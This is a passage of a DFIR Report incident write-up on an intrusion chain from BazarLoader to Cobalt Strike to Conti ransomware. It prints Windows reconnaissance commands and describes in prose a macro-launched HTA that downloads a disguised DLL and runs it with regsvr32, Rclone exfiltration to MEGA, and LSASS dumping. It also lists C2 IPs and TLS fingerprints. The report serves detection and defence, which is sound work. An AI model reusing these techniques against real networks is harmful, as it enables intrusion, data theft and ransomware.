href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21322"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31037"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35457"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32608"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38110"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21321"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21327"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div> </nav> </div> </div> </header> <div id="content" class="site-content"> <div class="site-content-cell"> <div class="wrap wrap-width"> <div id="primary" class="content-area"> <main id="main" class="site-main"> <article id="post-4690" class="post-4690 post type-post status-publish format-standard hentry category-adfind category-bazar category-cobaltstrike category-conti category-ransomware entry"> <div class="entry-content-holder"> <header class="entry-header"> <div class="entry-meta"> <span class="cat-links"> <a class="category-color-24" href="https://thedfirreport.com/category/adfind/">adfind</a> <a class="category-color-27" href="https://thedfirreport.com/category/bazar/">bazar</a> <a class="category-color-6" href="https://thedfirreport.com/category/cobaltstrike/">cobaltstrike</a> <a class="category-color-66" href="https://thedfirreport.com/category/conti/">conti</a> <a class="category-color-2" href="https://thedfirreport.com/category/ransomware/">ransomware</a> </span> </div> <h1 class="entry-title">CONTInuing the Bazar Ransomware Story</h1> <div class="entry-meta"> <span class="posted-on"><a href="https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/" rel="bookmark"><time class="entry-date published" datetime="2021-11-29T02:19:21+00:00">November 29, 2021</time></a></span> </div> </header> <div class="entry-content"> <div class="markdown"> <p>In this report we will discuss a case from early August where we witnessed threat actors utilizing <a href="https://thedfirreport.com/?s=BazarLoader" target="_blank" rel="noopener">BazarLoader</a> and <a href="https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/" target="_blank" rel="noopener">Cobalt Strike</a> to accomplish their mission of encrypting systems with Conti ransomware.</p> <p>The normal list of discovery tools were used during this case such as AdFind, Net, Ping, PowerView, and Nltest. Rclone was used to exfiltrate company data to Mega and Process Hacker was used to dump LSASS. The threat actors executed a Conti batch file on a server which then encrypted most of the domain joined systems.</p> <h2 id="case-summary">Case Summary</h2> <p>In August, we witnessed an intrusion that started from a BazarLoader infection. A Phishing campaign distributing password-protected zip files with weaponized documents to victims was the likely delivery source. Macros inside the word document extracted and executed a malicious .HTA document, which downloaded and loaded the BazarLoader DLL in memory.</p> <p>It is now apparent to the information security community that intrusions starting with BazarLoader frequently end with Conti ransomware. This case saw such a conclusion. There are some evident similarities in cases that involve Conti ransomware. Ransomware operators’ tooling and overall tasks performed tend to match across the cluster. When we look at our earlier <a href="https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks" target="_blank" rel="noopener">Conti case</a>, this becomes noticeable. This could be due to the widely circulated <a href="https://therecord.media/disgruntled-ransomware-affiliate-leaks-the-conti-gangs-technical-manuals/" target="_blank" rel="noopener">Conti manual</a> that was leaked by an affiliate. In this case, we saw the same pattern of events with tools like net, nltest, ShareFinder for discovery, Cobalt Strike for C2, and WMIC remote process creation for expanding their access within the network.</p> <p>Even though the intrusion lasted for five days total, Cobalt Strike and hands-on keyboard operators showed up in the first two hours of the intrusion. Straight away, they started gathering information to get the lay of the land using Net commands. Then they continued looking for open shares by executing the PowerView module, Invoke-ShareFinder.</p> <p>After collecting and dissecting the results from ShareFinder, they appeared to have a good understanding of the server and workstation layout of the organization as they started executing commands to gather information from specific, high-value servers. During that time, we saw errors when operators failed to alter specific parameters that indicate the operator is acting from a pre-defined playbook. They eventually decided to pivot laterally to a server using WMIC to execute a DLL Cobalt Strike beacon.</p> <p>Once they had access to the remote server via the Cobalt Strike beacon, they re-ran Invoke-ShareFinder and then exfiltrated data of interest from a different server using the Rclone application via the <a href="https://mega.io/">MEGA cloud storage service</a>.</p> <p>On the second day, the threat actors used RDP to access the backup server and in doing so, reviewed the backup settings, and running processes on the server via the taskmanager GUI.</p> <p>On day four, the threat actors returned and ran another round of exfiltration using Rclone and MEGA again.</p> <p>On the fifth day, they moved fast towards their final objective, which was Conti ransomware. Before executing Conti, they used RDP to install and configure the AnyDesk remote desktop application. Having GUI access, they attempted to use ProcessHacker to dump the LSASS process. After this last step, they deployed Conti ransomware via a batch script to all domain joined systems.</p> <p>One interesting fact about this case is that the threat actors were not seen interacting with the Domain Controllers (DCs). Most ransomware cases we see involve the threat actor executing code on the DCs.</p> <h3 id="services">Services</h3> <p>We offer multiple services including a <a href="https://thedfirreport.com/services/" target="_blank" rel="nofollow noopener">Threat Feed service</a> which tracks Command and Control frameworks such as Cobalt Strike, Metasploit, Empire, PoshC2, BazarLoader, etc. More information on this service and others can be found <a href="https://thedfirreport.com/services/" target="_blank" rel="nofollow noopener">here</a>.</p> <p>The Cobalt Strike servers in this case were added to the Threat Feed on 5/20/21 and 08/03/21</p> <p>We also have artifacts and IOCs available from this case such as pcaps, memory captures, files, event logs including Sysmon, Kape packages, and more, under our <a href="https://www.patreon.com/thedfirreport" target="_blank" rel="nofollow noopener">Security Researcher and Organization</a> services.</p> <h2 id="timeline">Timeline</h2> <p><img fetchpriority="high" decoding="async" class="alignnone size-full wp-image-4798" src="https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1.png" alt="" width="1663" height="3328" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1.png 1663w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-150x300.png 150w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-512x1024.png 512w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-768x1536.png 768w, https://thedfirreport.com/wp-content/uploads/2021/11/CONTInuing-the-Bazar-Ransomware-Story1-1023x2048.png 1023w" sizes="(max-width: 1663px) 100vw, 1663px" /></p> <p>Analysis and reporting completed by <a href="https://twitter.com/Kostastsale" target="_blank" rel="noopener">@Kostastsale</a>, <a href="https://twitter.com/pigerlin" target="_blank" rel="noopener">@pigerlin</a>, and <a href="https://twitter.com/_pete_0" target="_blank" rel="noopener">@_pete_0</a></p> <p>Reviewed by @TheDFIRReport</p> <h2 id="mitre-attck">MITRE ATT&CK</h2> <h3 id="initial-access">Initial Access</h3> <p>Thanks to <a href="https://twitter.com/James_inthe_box" target="_blank" rel="noopener">@James_inthe_box</a> for the sample!</p> <blockquote class="twitter-tweet" data-width="550" data-dnt="true"> <p lang="de" dir="ltr">More fresh <a href="https://twitter.com/hashtag/bazaloader?src=hash&ref_src=twsrc%5Etfw">#bazaloader</a> via password'd zips -> doc:<a href="https://t.co/fP7WiT4KHL">https://t.co/fP7WiT4KHL</a></p> <p>dll drop hash:<br />d21908a90b44f440d80bb728ffc0893746df936aefd7440fcba447bf8f523184</p> <p>c2: https://161.35.147[.]110/out/run/text/plain <a href="https://t.co/aFZc9NznEi">pic.twitter.com/aFZc9NznEi</a></p> <p>— James (@James_inthe_box) <a href="https://twitter.com/James_inthe_box/status/1422572684953620481?ref_src=twsrc%5Etfw">August 3, 2021</a></p></blockquote> <p><script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script></p> <p>As with previously documented intrusions, a weaponized Microsoft Word document is used to lure the user into enabling a macro to execute the payload. The user is presented with the following:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2"><img decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/f22784bc5813874c131d0c6f21acb3404084de7b57c0ae1f2afde6d8fe24c3a2" alt="enter image description here" width="709" height="373" /></a></p> <p>Reviewing the file we can observe that the filetype while labeled as a .doc file appears as XML when reviewing the file attributes.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/48fd9c86e04ef1a61d214e6e64ef7c41e6bd9a14221fa1d46971fef9324d2af8"><img decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/48fd9c86e04ef1a61d214e6e64ef7c41e6bd9a14221fa1d46971fef9324d2af8" alt="enter image description here" width="848" height="45" /></a></p> <p>A deeper inspection shows the Word 2003 XML formatting and the contained macro.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/378c5988f8fc4afa0a81cabf543a41f1e299b701f952ad4077406bd2b7110731"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/378c5988f8fc4afa0a81cabf543a41f1e299b701f952ad4077406bd2b7110731" alt="enter image description here" width="650" height="983" /></a></p> <p>Once the macro has been enabled, in the next stage, an HTML Application (HTA) file is created and dropped into the user’s folder:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/b7eb0f03b4298506d506b3212d1bcc69972e2706249a5b9e535f6ea28d43a323"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/b7eb0f03b4298506d506b3212d1bcc69972e2706249a5b9e535f6ea28d43a323" alt="enter image description here" width="949" height="61" /></a></p> <p>Followed by the execution of the HTA:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4755" src="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png" alt="" width="310" height="35" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1.png 310w, https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c-1-300x34.png 300w" sizes="auto, (max-width: 310px) 100vw, 310px" /></a></p> <p>Analysis of the HTA file shows a mix of encoded HTML and JavaScript/VBScript code, not to mention profanity at the start of the file.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9c60564c3c931ab0997a0b1d1576ca09d0ddec29b331655cbcf13c77fb8a5f5a"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9c60564c3c931ab0997a0b1d1576ca09d0ddec29b331655cbcf13c77fb8a5f5a" alt="enter image description here" width="969" height="498" /></a></p> <p>The base64 encoded string can be decoded to:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/9f647bdcc95ed17b46e7e166bd80c79c85701cc53d2c98873bec3a897ce304f6"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/9f647bdcc95ed17b46e7e166bd80c79c85701cc53d2c98873bec3a897ce304f6" alt="enter image description here" width="1723" height="455" /></a></p> <p>The code downloads a binary file (compareForfor.jpg) masquerading as a JPG (Image file) from millscruelg[.]com to the following folder “c:\users\public”, and incorporating VBScript code, utilizes REGSVR32 to execute this DLL.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/beaa83c86c77ad8f3fe2ad4baa905b35933b1294af9f5631e80e60aafef312b3"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/beaa83c86c77ad8f3fe2ad4baa905b35933b1294af9f5631e80e60aafef312b3" alt="enter image description here" width="586" height="40" /></a></p> <hr /> <p>This initiates a connection to 64.227.65[.]60:443 and invokes a Svchost.exe, followed by a lookup to myexternalip[.]com to retrieve the external public-facing IPv4 address of the network. The attacker could use this information to verify the network being targeted and/or to facilitate tool configuration. Two DLLs were loaded via RunDll32 using the Svchost process. The first was D574.dll:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/2de12905c5c982b4ae7876ef23c5594051efc03fb0bf0daaad84f480f773830c" alt="enter image description here" width="429" height="40" /></a></p> <hr /> <p>Followed by D8B3.dll:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/6c007b9f755b01e99fdb11ba0983477311fd7ae7c133edc50d351d2d6fb44bf5" alt="enter image description here" /></p> <p>D8B3.dll injected into the Winlogon process (high integrity):</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/157ab4613bc64d45aad39a06f7c9e1bbdac31afe3e1da5845f4e4dee593e2c11"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/157ab4613bc64d45aad39a06f7c9e1bbdac31afe3e1da5845f4e4dee593e2c11" alt="enter image description here" width="1235" height="29" /></a></p> <p>In the case of D8B3.dll, the DLL was Go compiled. Both DLLs had invalid certificates and could be detected by checking for any failed/revoked status.:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/44cd52c302739e02de041a7db50bc820f0d9b8bc8c948432f55a151e8935e618"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/44cd52c302739e02de041a7db50bc820f0d9b8bc8c948432f55a151e8935e618" alt="enter image description here" width="195" height="63" /></a></p> <p>Additionally, each DLL had no populated metadata relating to the DLL:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/bc100cd9ef535089bdde054eeb00d24a45ba85231e588f23ddf3c0b2e5176f08" alt="enter image description here" /></p> <p>The process hierarchy tree visualization below:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/927a09d2bb51e93a6abf163e97fbedc1cf09f76f333ec1a7e5a936345fffc8a5"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/927a09d2bb51e93a6abf163e97fbedc1cf09f76f333ec1a7e5a936345fffc8a5" alt="enter image description here" width="508" height="500" /></a></p> <p>This is very similar to the Bazarloader <a href="https://isc.sans.edu/diary/rss/27738" target="_blank" rel="noopener">analysis by Brad Duncan</a> on 11/08/2021.</p> <h3 id="persistence">Persistence</h3> <p>We observed the AnyDesk application created under the folder c:\users\<REDACTED>\Videos’, an unusual location and suspicious location for process activity – this is a good detection opportunity where portable executables appear on non-standard file system locations.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/7f72bf852b58de31e886393160e0dc14665c86c9863f90ac3b69bccc801d18cb"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/7f72bf852b58de31e886393160e0dc14665c86c9863f90ac3b69bccc801d18cb" alt="enter image description here" width="383" height="24" /></a></p> <hr /> <p><a href="https://anydesk.com/" target="_blank" rel="noopener">AnyDesk</a> is a closed source remote desktop application that is available for several operating systems. It is free for private use. We observed a long connection initiated from the AnyDesk application towards legitimately registered IPv4 ranges. However, we did not observe many events of interest during these sessions.</p> <h3 id="credential-access">Credential Access</h3> <p>ProcessHacker was also dropped in the root of C:\ and likely used to access the LSASS process. The use of utilities such as ProcessHacker would be unusual for typical users, and applications from a C:\ root would also be suspicious in certain environments.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/ae2d915c25b3741d2639c30c2c10417bf81fcadfdc2c417ba004a8ae6bc64b6e"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/ae2d915c25b3741d2639c30c2c10417bf81fcadfdc2c417ba004a8ae6bc64b6e" alt="enter image description here" width="411" height="98" /></a></p> <h3 id="discovery">Discovery</h3> <p>Using the RunDLL32 and Winlogon process, we observed many typical host and network discovery commands utilizing living off the land techniques such as net, nltest, tasklist and time. Examples included:</p> <pre><code><span class="hljs-keyword">tasklist</span> /s <REDACTED> <span class="hljs-keyword">net</span> group <span class="hljs-string">"domain admins"</span> /dom <span class="hljs-keyword">net</span> localgroup <span class="hljs-string">"administrator"</span> <span class="hljs-keyword">nltest</span> /domain_trusts /all_trusts <span class="hljs-keyword">net</span> view /<span class="hljs-literal">all</span> /domain <span class="hljs-keyword">net</span> view /<span class="hljs-literal">all</span> time <span class="hljs-keyword">ping</span></code></pre> <p>While running some of these commands, copy paste errors were present indicating the operator is likely working from a runbook, like the leaked Conti manual from August as seen via the tasklist /s ip rather than the actual host systems IP’s and seen right after this mistake.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4773" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png" alt="" width="683" height="187" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-7.png 683w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-7-300x82.png 300w" sizes="auto, (max-width: 683px) 100vw, 683px" /></a></p> <p>Cmd.exe process invoked a lot of the commands with unusual parent processes such as RunDLL32.exe. The example below using the time command:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/b9c5ab4ca577c810f6fe15373ae4a2bcc3a79e790a788e0aaa44945ba1c5d6f1"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/b9c5ab4ca577c810f6fe15373ae4a2bcc3a79e790a788e0aaa44945ba1c5d6f1" alt="enter image description here" width="515" height="242" /></a></p> <hr /> <p>Red Canary provides a good detection guide for RunDLL32; <a href="https://redcanary.com/threat-detection-report/techniques/rundll32/" target="_blank" rel="noopener">this</a> covers unusual RunDLL32 activity such as command less, unusual spawned activity, etc.</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/4cf94e23abd22fa0ad6e718ca833baa0e0b530494c3309acc5d001bda83bdbaa"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/4cf94e23abd22fa0ad6e718ca833baa0e0b530494c3309acc5d001bda83bdbaa" alt="enter image description here" width="551" height="220" /></a></p> <hr /> <p>Discovery command invocation:</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/0279e95c4c33e2b33b3509e07e19811588d32c0488908f01d7c006cd0d963e03"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/0279e95c4c33e2b33b3509e07e19811588d32c0488908f01d7c006cd0d963e03" alt="enter image description here" width="937" height="436" /></a></p> <p><a href="https://thedfirreport.com/2020/05/08/adfind-recon/" target="_blank" rel="noopener">AdFind</a> was observed via a file write for the binary, but there was no evidence of execution.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/e2869d1ae419f425ffa968640aab1a4db4e893e835136118f2a868727d5b2ee5"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/e2869d1ae419f425ffa968640aab1a4db4e893e835136118f2a868727d5b2ee5" alt="enter image description here" width="331" height="42" /></a></p> <p>File share enumeration was achieved using the PowerShell <a href="https://github.com/darkoperator/Veil-PowerView/blob/master/PowerView/functions/Invoke-ShareFinder.ps1" target="_blank" rel="noopener">Invoke-ShareFinder</a> script, part of PowerView.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5e2b9072978174209ec9599d77e24814eb667a9a475a04d303a32627a73ad5b3"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/5e2b9072978174209ec9599d77e24814eb667a9a475a04d303a32627a73ad5b3" alt="enter image description here" width="766" height="209" /></a></p> <p>The output file was created at c:\ProgramData\found_shares.txt. The use of this tool has been observed in other <a href="https://thedfirreport.com/2021/07/19/icedid-and-cobalt-strike-vs-antivirus/" target="_blank" rel="noopener">recent intrusions</a>. PowerShell was invoked by the WinLogon process and the resulting file created by Rundll32.exe</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/93ddd3e8229d05f00c11963ef5f11182f696d3d2907be284d0cbba1d30d62b5d"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/93ddd3e8229d05f00c11963ef5f11182f696d3d2907be284d0cbba1d30d62b5d" alt="enter image description here" width="338" height="44" /></a></p> <hr /> </div> <p>On the second day of the intrusion, the threat actors accessed the backup server via RDP via the Cobalt Strike beacon and opened up the back up console on their server.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4778" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png" alt="" width="660" height="417" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-8.png 660w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-8-300x190.png 300w" sizes="auto, (max-width: 660px) 100vw, 660px" /></a></p> <p>After reviewing the backups, they also opened taskmanager via the GUI (<a href="https://www.hexacorn.com/blog/2018/07/22/taskmgr-exe-slashing-numbers/" target="_blank" rel="noopener">indicated by the /4 in the process command line</a>) to review the running processes on the system.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4779" src="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png" alt="" width="464" height="417" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/5794-9.png 464w, https://thedfirreport.com/wp-content/uploads/2021/11/5794-9-300x270.png 300w" sizes="auto, (max-width: 464px) 100vw, 464px" /></a></p> <div class="markdown"> <h3 id="lateral-movement">Lateral Movement</h3> <p>A Cobalt Strike beacon was executed on a critical asset (backup host in this intrusion) within the network using the following command:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/360da830c3f3842301f7b01e444953cbfc7c457d21206b1b712c8dda08094c72"><img loading="lazy" decoding="async" class="alignnone" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/360da830c3f3842301f7b01e444953cbfc7c457d21206b1b712c8dda08094c72" alt="enter image description here" width="1023" height="222" /></a></p> <hr /> <p>Remote process execution achieved using WMI invoking Rundll32 to load the 143.dll (Cobalt Strike beacon) on the target host:</p> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/8a72c5822404bebc0e8c7c6f9673fa4a78a680c8dedc4adf443f0313d2cc35c6" alt="enter image description here" /></p> <p>The Cobalt Strike beacon (143.dll) injected into the svchost process ‘svchost.exe -k UnistackSvcGroup -s CDPUserSvc’:</p> <hr /> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4757" src="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png" alt="" width="409" height="140" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf.png 409w, https://thedfirreport.com/wp-content/uploads/2021/11/a38f6e90769a77efb1025677dae290858a96d298e805dec77d49d4b3660fdddf-300x103.png 300w" sizes="auto, (max-width: 409px) 100vw, 409px" /></a></p> <hr /> <p>Followed by a request to checkauj[.]com (82.117.252.143). Approximately 9 hours later, the attacker established an RDP session via the 143.dll. This was achieved very early in the intrusion, and we were able to correlate the activity:</p> <hr /> <p><img decoding="async" title="enter image title here" src="https://thedfirreport.com/wp-content/uploads/2021/11/b2ae321614fb060e6f17a7b95a08bec9ccff1b1fb884d0e327c8bacef1403b2f" alt="enter image description here" /></p> <hr /> <p>During this event, we believe that the attacker disclosed the remote workstation name ‘win-344vu98d3ru’.</p> <p><a href="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png"><img loading="lazy" decoding="async" class="alignnone size-full wp-image-4772" src="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png" alt="" width="526" height="695" srcset="https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3.png 526w, https://thedfirreport.com/wp-content/uploads/2021/11/2d929ab92d2873804c44b155f95bc9470fa15dedb84788f9a84d94b86d62e8c3-227x300.png 227w" sizes="auto, (max-width: 526px) 100vw, 526px" /></a></p> <h3 id="command-and-control">Command and Control</h3> <p>The Bazar DLL masquerading as a jpg made use of HTTPS C2 throughout the full length of the intrusion.</p> <h4 id="bazar-c2">Bazar C2</h4> <p>64.227.65.60:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">7f</span>:d6:df:<span class="hljs-number">4</span>d:<span class="hljs-number">5</span>e:c4:d9:<span class="hljs-number">71</span>:c0:<span class="hljs-number">46</span>:<span class="hljs-number">8</span>d:<span class="hljs-number">47</span>:e5:<span class="hljs-number">81</span>:<span class="hljs-number">75</span>:<span class="hljs-number">57</span>:d6:<span class="hljs-number">92</span>:<span class="hljs-number">72</span>:<span class="hljs-number">96</span> ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">28</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>161.35.147.110:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">21</span>:ff:<span class="hljs-number">9f</span>:e0:<span class="hljs-number">8</span>a:dd:c3:ed:<span class="hljs-number">36</span>:<span class="hljs-number">90</span>:a0:e1:<span class="hljs-number">11</span>:<span class="hljs-number">70</span>:fe:c4:b3:<span class="hljs-number">42</span>:f5:<span class="hljs-number">1</span>a ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>161.35.155.92:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">42</span>:<span class="hljs-number">7</span>d:a4:<span class="hljs-number">48</span>:<span class="hljs-number">5</span>b:<span class="hljs-number">6</span>b:<span class="hljs-number">2</span>b:<span class="hljs-number">92</span>:<span class="hljs-number">2</span>c:<span class="hljs-number">07</span>:<span class="hljs-number">9</span>d:cc:<span class="hljs-number">59</span>:<span class="hljs-number">14</span>:<span class="hljs-number">2</span>e:de:b1:e8:f5:bb ] Not Before: <span class="hljs-number">2021</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Not After: <span class="hljs-number">2022</span>/<span class="hljs-number">08</span>/<span class="hljs-number">03</span> <span class="hljs-number">07</span>:<span class="hljs-number">37</span>:<span class="hljs-number">30</span> UTC Issuer Org: GG EST Subject Common: perdefue.fr Subject Org: GG EST Public Algorithm: rsaEncryption </code></pre> <p>64.227.69.92:443</p> <pre><code><span class="hljs-tag">JA3</span><span class="hljs-pseudo">:72a589da586844d7f0818ce684948eea</span> <span class="hljs-tag">JA3s</span><span class="hljs-pseudo">:ec74a5c51106f0419184d0dd08fb05bc</span></code></pre> <pre><code>Certificate: [<span class="hljs-number">97</span>:<span 